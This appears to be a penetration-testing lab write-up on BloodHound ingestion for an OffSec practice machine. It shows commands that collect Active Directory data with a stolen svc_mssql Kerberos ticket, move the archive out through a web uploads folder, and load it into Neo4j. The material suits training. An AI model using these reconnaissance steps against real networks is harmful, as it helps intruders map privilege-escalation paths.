BloodHound
BloodHound is a powerful tool used by adversaries to visualize and analyze Active Directory relationships, allowing them to quickly identify and exploit potential attack paths and privilege escalation opportunities within a network. It automates the reconnaissance phase of an attack, helping attackers pinpoint weak points and ultimately compromise Active Directory environments.
Ingestion
PS C:\tmp> cp .\access.offsec_20250421082845_BloodHound.zip C:\xampp\htdocs\uploads\
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/access/bloodhound]
└─$ wget -q http://server.access.offsec/uploads/access.offsec_20250421082845_BloodHound.zipAs part of the adPEAS script, it has executed the embedded SharpHound
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/access/bloodhound]
└─$ KRB5CCNAME=../svc_mssql@server.access.offsec.ccache bloodhound-python -d ACCESS.OFFSEC -u svc_mssql -k -no-pass --auth-method kerberos -ns $IP -dc server.access.offsec --zip -c Experimental,LoggedOn,All -op python_
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: access.offsec
INFO: Using TGT from cache
INFO: Found TGT with correct principal in ccache file.
INFO: Connecting to LDAP server: server.access.offsec
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: server.access.offsec
INFO: Found 6 users
INFO: Found 52 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: SERVER.access.offsec
INFO: User with SID S-1-5-21-537427935-490066102-1511301751-1103 is logged in on SERVER.access.offsec
INFO: Done in 00M 07S
INFO: Compressing output into 20250421175728_bloodhound.zipPerforming an additional ingestion with bloodhound-python using the TGT of the svc_mssql account
Prep
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/a┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/access/bloodhound]
└─$ neo4j_kickstart
[sudo] password for kali:
2025-04-21 15:59:43.578+0000 INFO Starting...
2025-04-21 15:59:44.043+0000 INFO This instance is ServerId{823c0986} (823c0986-8860-45ad-af0e-a0f1316bef16)
2025-04-21 15:59:45.248+0000 INFO ======== Neo4j 4.4.26 ========
2025-04-21 15:59:46.104+0000 INFO Performing postInitialization step for component 'security-users' with version 3 and status CURRENT
2025-04-21 15:59:46.104+0000 INFO Updating the initial password in component 'security-users'
2025-04-21 15:59:46.984+0000 INFO Bolt enabled on localhost:7687.
2025-04-21 15:59:47.902+0000 INFO Remote interface available at http://localhost:7474/
2025-04-21 15:59:47.908+0000 INFO id: F22BE6505A50EE3B6AE80482B39DD2B6A7082E68C916A87DF6F1CD7ECA4DD942
2025-04-21 15:59:47.908+0000 INFO name: system
2025-04-21 15:59:47.908+0000 INFO creationDate: 2024-09-01T10:39:20.089Z
2025-04-21 15:59:47.908+0000 INFO Started.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/a┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/access/bloodhound]
└─$ bloodhound neo4j & bloodhound
/Practice/Access/4-Post_Enumeration/attachments/{DEBEA478-4735-42E4-9B44-86EC0D53795F}.png)
Uploaded ingested domain data
svc_mssql
/Practice/Access/4-Post_Enumeration/attachments/{F7F6CC61-0A3D-4195-9887-6629062A9E46}.png)
/Practice/Access/4-Post_Enumeration/attachments/{2901198B-356C-4ABB-9609-6F733E58EFB6}.png)
/Practice/Access/4-Post_Enumeration/attachments/{9B462E0E-23B7-476A-A15C-D11B2643E008}.png)
N/A